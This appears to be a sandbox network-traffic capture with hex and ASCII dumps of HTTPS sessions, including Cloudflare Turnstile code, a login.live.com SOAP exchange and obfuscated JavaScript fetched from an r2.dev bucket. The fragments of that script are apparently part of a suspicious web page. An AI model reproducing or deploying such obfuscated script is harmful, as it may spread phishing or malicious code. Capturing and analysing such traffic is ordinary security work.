                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 72 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                                                                                                Data Ascii: ray$/.test(a))return rt(e,r)}}function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                                                                                                                                Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(fu
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e
                                                                                                                                                                                                                                Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(fun
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73
                                                                                                                                                                                                                                Data Ascii: function gt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.s
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c
                                                                                                                                                                                                                                Data Ascii: ==Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==nul
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                Data Ascii: {return Be()?Ie=Reflect.construct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28
                                                                                                                                                                                                                                Data Ascii: tion b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC1369INData Raw: 64 65 6e 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65
                                                                                                                                                                                                                                Data Ascii: den",f.style.overflowY="auto",f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                21192.168.2.44977740.126.31.69443
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/soap+xml
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                Content-Length: 3592
                                                                                                                                                                                                                                Host: login.live.com
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                Expires: Thu, 03 Oct 2024 20:56:05 GMT
                                                                                                                                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                x-ms-route-info: C517_BL2
                                                                                                                                                                                                                                x-ms-request-id: fc643032-060b-4e1b-99f7-3590d0b8cd63
                                                                                                                                                                                                                                PPServer: PPV: 30 H: BL02EPF0001D7AA V: 0
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:05 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 11389
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                22192.168.2.449779162.159.140.2374432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:05 UTC375OUTGET /index.js HTTP/1.1
                                                                                                                                                                                                                                Host: pub-cb72f4af1674441897427b55eaf679a1.r2.dev
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC290INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:06 GMT
                                                                                                                                                                                                                                Content-Type: text/javascript
                                                                                                                                                                                                                                Content-Length: 159727
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                ETag: "4960c5865c772515185324d4d78c3af8"
                                                                                                                                                                                                                                Last-Modified: Thu, 22 Aug 2024 15:49:10 GMT
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd7b3788d7c99-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 63 6f 6e 73 74 20 61 30 5f 30 78 31 39 39 33 33 32 3d 61 30 5f 30 78 31 31 39 38 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 61 33 39 30 34 2c 5f 30 78 31 36 35 33 61 66 29 7b 63 6f 6e 73 74 20 5f 30 78 33 31 61 62 38 65 3d 61 30 5f 30 78 31 31 39 38 2c 5f 30 78 34 33 30 65 38 65 3d 5f 30 78 34 61 33 39 30 34 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 35 62 37 39 65 32 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 61 62 38 65 28 30 78 31 65 35 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 61 62 38 65 28 30 78 31 66 63 29 29 2f 30 78 32 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 61 62 38 65 28 30 78 34 39 39 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 31 61 62 38 65 28
                                                                                                                                                                                                                                Data Ascii: const a0_0x199332=a0_0x1198;(function(_0x4a3904,_0x1653af){const _0x31ab8e=a0_0x1198,_0x430e8e=_0x4a3904();while(!![]){try{const _0x5b79e2=-parseInt(_0x31ab8e(0x1e5))/0x1+-parseInt(_0x31ab8e(0x1fc))/0x2+parseInt(_0x31ab8e(0x499))/0x3*(-parseInt(_0x31ab8e(
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 3e 7b 63 6f 6e 73 74 20 5f 30 78 31 39 63 34 37 63 3d 5f 30 78 35 39 39 33 37 37 3b 66 6f 72 28 63 6f 6e 73 74 20 5f 30 78 34 61 64 64 62 38 20 6f 66 20 5f 30 78 32 62 66 37 62 35 29 69 66 28 5f 30 78 34 61 64 64 62 38 5b 5f 30 78 31 39 63 34 37 63 28 30 78 31 38 64 29 5d 3d 3d 3d 5f 30 78 31 39 63 34 37 63 28 30 78 34 33 65 29 29 7b 66 6f 72 28 63 6f 6e 73 74 20 5f 30 78 34 61 36 34 65 34 20 6f 66 20 5f 30 78 34 61 64 64 62 38 5b 5f 30 78 31 39 63 34 37 63 28 30 78 32 66 61 29 5d 29 5f 30 78 34 61 36 34 65 34 5b 5f 30 78 31 39 63 34 37 63 28 30 78 32 32 36 29 5d 3d 3d 3d 5f 30 78 31 39 63 34 37 63 28 30 78 32 66 32 29 26 26 5f 30 78 34 61 36 34 65 34 5b 5f 30 78 31 39 63 34 37 63 28 30 78 33 30 35 29 5d 3d 3d 3d 5f 30 78 31 39 63 34 37 63 28 30 78 32 66
                                                                                                                                                                                                                                Data Ascii: >{const _0x19c47c=_0x599377;for(const _0x4addb8 of _0x2bf7b5)if(_0x4addb8[_0x19c47c(0x18d)]===_0x19c47c(0x43e)){for(const _0x4a64e4 of _0x4addb8[_0x19c47c(0x2fa)])_0x4a64e4[_0x19c47c(0x226)]===_0x19c47c(0x2f2)&&_0x4a64e4[_0x19c47c(0x305)]===_0x19c47c(0x2f
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 38 3d 5f 30 78 32 62 31 38 38 33 3b 69 66 28 27 49 75 66 49 62 27 3d 3d 3d 27 43 6d 4b 4b 4c 27 29 7b 63 6f 6e 73 74 20 5f 30 78 36 64 34 31 62 32 3d 74 68 69 73 5b 5f 30 78 35 65 38 32 34 38 28 30 78 34 31 62 29 5d 5b 5f 30 78 35 65 38 32 34 38 28 30 78 34 61 66 29 5d 21 3d 3d 76 6f 69 64 20 30 78 30 7c 7c 74 68 69 73 5b 5f 30 78 35 65 38 32 34 38 28 30 78 31 37 34 29 5d 5b 5f 30 78 35 65 38 32 34 38 28 30 78 33 61 65 29 5d 21 3d 3d 76 6f 69 64 20 30 78 30 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 30 78 39 62 37 38 62 35 28 28 5f 30 78 31 61 62 38 63 63 2c 5f 30 78 62 62 34 31 63 61 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 62 35 64 33 39 32 3d 5f 30 78 35 65 38 32 34 38 3b 5f 30 78 31 31 39 30 38 30 5b 5f 30 78 62 35 64 33 39 32 28 30 78 33 64 66 29 5d 28 28
                                                                                                                                                                                                                                Data Ascii: 8=_0x2b1883;if('IufIb'==='CmKKL'){const _0x6d41b2=this[_0x5e8248(0x41b)][_0x5e8248(0x4af)]!==void 0x0||this[_0x5e8248(0x174)][_0x5e8248(0x3ae)]!==void 0x0;return new _0x9b78b5((_0x1ab8cc,_0xbb41ca)=>{const _0xb5d392=_0x5e8248;_0x119080[_0xb5d392(0x3df)]((
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 75 6c 6c 29 3b 77 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 33 62 31 29 5d 3d 27 30 27 2c 77 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 32 64 39 29 5d 3d 27 31 27 2c 77 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 34 66 33 29 5d 3d 27 32 27 2c 77 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 34 30 34 29 5d 3d 27 33 27 2c 77 5b 27 6d 65 73 73 61 67 65 27 5d 3d 27 34 27 2c 77 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 32 31 61 29 5d 3d 27 35 27 2c 77 5b 27 6e 6f 6f 70 27 5d 3d 27 36 27 3b 63 6f 6e 73 74 20 41 3d 4f 62 6a 65 63 74 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 31 39 33 29 5d 28 6e 75 6c 6c 29 3b 4f 62 6a 65 63 74 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 33 66 65 29 5d 28 77 29 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 31 65 37 29
                                                                                                                                                                                                                                Data Ascii: ull);w[a0_0x199332(0x3b1)]='0',w[a0_0x199332(0x2d9)]='1',w[a0_0x199332(0x4f3)]='2',w[a0_0x199332(0x404)]='3',w['message']='4',w[a0_0x199332(0x21a)]='5',w['noop']='6';const A=Object[a0_0x199332(0x193)](null);Object[a0_0x199332(0x3fe)](w)[a0_0x199332(0x1e7)
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 29 5d 28 27 2c 27 29 5b 30 78 31 5d 3b 5f 30 78 35 39 62 31 65 35 28 27 62 27 2b 28 5f 30 78 34 38 63 36 64 36 7c 7c 27 27 29 29 3b 7d 7d 2c 5f 30 78 31 31 66 38 63 39 5b 5f 30 78 31 66 61 35 66 35 28 30 78 33 36 39 29 2b 5f 30 78 31 66 61 35 66 35 28 30 78 31 37 33 29 5d 28 5f 30 78 33 66 35 32 62 65 29 3b 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 5f 30 78 34 36 34 31 32 38 29 7b 63 6f 6e 73 74 20 5f 30 78 35 37 30 31 32 66 3d 61 30 5f 30 78 31 39 39 33 33 32 3b 72 65 74 75 72 6e 20 5f 30 78 34 36 34 31 32 38 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 3f 5f 30 78 34 36 34 31 32 38 3a 5f 30 78 34 36 34 31 32 38 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 42 75 66 66 65 72 3f 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 5f 30 78
                                                                                                                                                                                                                                Data Ascii: )](',')[0x1];_0x59b1e5('b'+(_0x48c6d6||''));}},_0x11f8c9[_0x1fa5f5(0x369)+_0x1fa5f5(0x173)](_0x3f52be);};function G(_0x464128){const _0x57012f=a0_0x199332;return _0x464128 instanceof Uint8Array?_0x464128:_0x464128 instanceof ArrayBuffer?new Uint8Array(_0x
                                                                                                                                                                                                                                2024-10-03 20:57:06 UTC1369INData Raw: 33 32 28 30 78 34 62 32 29 2b 27 55 56 57 58 59 5a 61 62 63 64 27 2b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 34 35 65 29 2b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 34 32 33 29 2b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 34 35 64 29 2b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 31 64 63 29 2c 52 3d 74 79 70 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 3e 27 75 27 3f 5b 5d 3a 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 30 78 31 30 30 29 3b 66 6f 72 28 6c 65 74 20 69 3d 30 78 30 3b 69 3c 4a 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 31 65 33 29 5d 3b 69 2b 2b 29 52 5b 4a 5b 61 30 5f 30 78 31 39 39 33 33 32 28 30 78 32 38 36 29 5d 28 69 29 5d 3d 69 3b 63 6f 6e 73 74 20 53 65 3d 5f 30 78 35 31 37 65 37 35 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 31 33 36 64 30
                                                                                                                                                                                                                                Data Ascii: 32(0x4b2)+'UVWXYZabcd'+a0_0x199332(0x45e)+a0_0x199332(0x423)+a0_0x199332(0x45d)+a0_0x199332(0x1dc),R=typeof Uint8Array>'u'?[]:new Uint8Array(0x100);for(let i=0x0;i<J[a0_0x199332(0x1e3)];i++)R[J[a0_0x199332(0x286)](i)]=i;const Se=_0x517e75=>{const _0x136d0
